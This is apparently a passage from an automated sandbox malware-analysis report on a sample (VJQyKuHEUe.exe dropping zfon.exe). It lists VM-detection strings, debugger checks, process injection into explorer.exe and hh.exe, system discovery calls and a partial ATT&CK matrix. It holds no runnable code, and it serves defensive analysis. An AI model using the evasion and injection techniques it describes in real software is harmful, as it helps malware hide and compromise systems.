Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: explorer.exe, 0000000E.00000003.2737490360.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}wActivationPolicy
Source: explorer.exe, 0000000E.00000002.4591125608.0000000000C83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3870691749.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3867808677.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3865469179.0000000008E2E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008E2E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4601406325.0000000008E2E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000E.00000003.2711021936.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000E.00000003.2737490360.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: VJQyKuHEUe.exe, 00000000.00000002.2543360730.000000000890C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yh
Source: explorer.exe, 0000000E.00000003.2706319121.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}7e\xei
Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: explorer.exe, 0000000E.00000003.2726021307.000000000C071000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:d
Source: explorer.exe, 0000000E.00000002.4594191362.000000000482C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000E.00000003.2660154040.00000000047DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation CounterGOOGLE
Source: Amcache.hve.10.drBinary or memory string: vmci.sys
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
Source: explorer.exe, 0000000E.00000003.3871764293.0000000008C20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4600722578.0000000008C22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWUSm32\DriverStore\en\machine.inf_loc
Source: explorer.exe, 0000000E.00000003.2737490360.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000E.00000003.3867808677.0000000008CB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
Source: explorer.exe, 0000000E.00000003.2706319121.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000B.00000002.2585817290.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: Amcache.hve.10.drBinary or memory string: VMware20,1
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: explorer.exe, 0000000E.00000003.2726021307.000000000C071000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 0000000E.00000002.4601406325.0000000008E7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWare
Source: explorer.exe, 0000000E.00000003.2711021936.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
Source: explorer.exe, 0000000B.00000002.2583918410.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: explorer.exe, 0000000E.00000003.3867808677.0000000008CB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000*
Source: explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 0000000E.00000002.4591125608.0000000000C83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 0000000B.00000002.2589830986.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000002.2585817290.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: explorer.exe, 0000000E.00000003.2602909404.00000000047FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: explorer.exe, 0000000B.00000002.2585817290.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
Source: explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
Source: explorer.exe, 0000000E.00000003.2711021936.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\#
Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: explorer.exe, 0000000E.00000003.2711021936.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 0000000E.00000002.4601406325.0000000008E7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000002.4591125608.0000000000C83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000}
Source: explorer.exe, 0000000E.00000003.2705880886.0000000004819000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: explorer.exe, 0000000E.00000003.2737490360.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}us.exe
Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: VJQyKuHEUe.exe, 00000000.00000002.2527508424.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, hh.exe, 00000007.00000002.4591567895.000001CDCB748000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 0000000E.00000003.2711021936.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\
Source: explorer.exe, 0000000E.00000003.2737490360.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0R
Source: explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: explorer.exe, 0000000E.00000003.2602909404.00000000047FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
Source: explorer.exe, 0000000B.00000002.2583918410.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 0000000E.00000003.2668179739.0000000008E85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: explorer.exe, 0000000E.00000003.2656869082.0000000008CD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxH
Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: explorer.exe, 0000000E.00000003.2706319121.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}9507e]
Source: explorer.exe, 0000000E.00000003.2706319121.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000003.2737490360.000000000C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~MR
Source: explorer.exe, 0000000B.00000002.2583918410.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
Source: explorer.exe, 0000000E.00000002.4591125608.0000000000C83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF7F97A4EE0 GetLastError,IsDebuggerPresent,OutputDebugStringW,5_2_00007FF7F97A4EE0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF7F97A4EE0 GetLastError,IsDebuggerPresent,OutputDebugStringW,5_2_00007FF7F97A4EE0
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF7F97A43EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF7F97A43EC
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B912D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF8B912D460
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8BFAD4628 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF8BFAD4628
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8BFB60AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF8BFB60AD8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF7F97A43EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF7F97A43EC
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A939D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF8A939D460
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8BFB84628 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF8BFB84628
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8BFBA0AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF8BFBA0AD8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF7F97A43EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF7F97A43EC
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A804D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8A804D460
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8AF890AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8AF890AD8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8BFB74628 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8BFB74628
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeMemory allocated: C:\Windows\hh.exe base: 1CDCB5B0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeMemory allocated: C:\Windows\explorer.exe base: 3050000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeMemory allocated: C:\Windows\explorer.exe base: 1230000 protect: page read and writeJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeNtMapViewOfSection: Indirect: 0x7FF7F9818C91Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeNtMapViewOfSection: Indirect: 0x7FF7F98191CEJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeNtUnmapViewOfSection: Indirect: 0x7FF7F9819162Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeMemory written: PID: 1028 base: 3050000 value: E8Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeMemory written: PID: 1028 base: 1230000 value: 00Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeThread register set: target process: 5780Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeMemory written: C:\Windows\hh.exe base: 1CDCB5B0000Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeMemory written: C:\Windows\explorer.exe base: 3050000Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeMemory written: C:\Windows\explorer.exe base: 1230000Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe" Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Windows\hh.exe C:\windows\hh.exeJump to behavior
Source: hh.exe, 00000007.00000002.4591567895.000001CDCB7CF000.00000004.00000020.00020000.00000000.sdmp, hh.exe, 00000007.00000002.4591567895.000001CDCB748000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Manager
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
Source: explorer.exe, 0000000B.00000000.2551931305.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
Source: explorer.exe, 0000000B.00000002.2585674966.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2551931305.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.4594191362.00000000046BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.2551931305.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.4591125608.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4597563509.0000000004AA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
Source: explorer.exe, 0000000E.00000003.3869237698.0000000004789000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4594191362.0000000004789000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2602666332.0000000004789000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman_
Source: explorer.exe, 0000000B.00000000.2551931305.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.2551388655.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2581630998.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: ___lc_locale_name_func,__crtGetLocaleInfoEx,5_2_00007FF8B910F930
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,5_2_00007FF8B90E9B90
Source: C:\Windows\hh.exeCode function: gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetLocalTime,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,7_2_000001CDCB8F6370
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: ___lc_locale_name_func,__crtGetLocaleInfoEx,26_2_00007FF8A937F930
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,26_2_00007FF8A9359B90
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: ___lc_locale_name_func,__crtGetLocaleInfoEx,28_2_00007FF8A802F930
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,28_2_00007FF8A8009B90
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeQueries volume information: C:\Users\user\Desktop\VJQyKuHEUe.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF7F974DD10 GetSystemTimeAsFileTime,5_2_00007FF7F974DD10
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB921F88 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,7_2_000001CDCB921F88
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media
1
Native API
1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
1
Disable or Modify Tools
2
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
Windows Service
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory11
Peripheral Device Discovery
Remote Desktop Protocol2
Input Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Windows Service
1
Abuse Elevation Control Mechanism
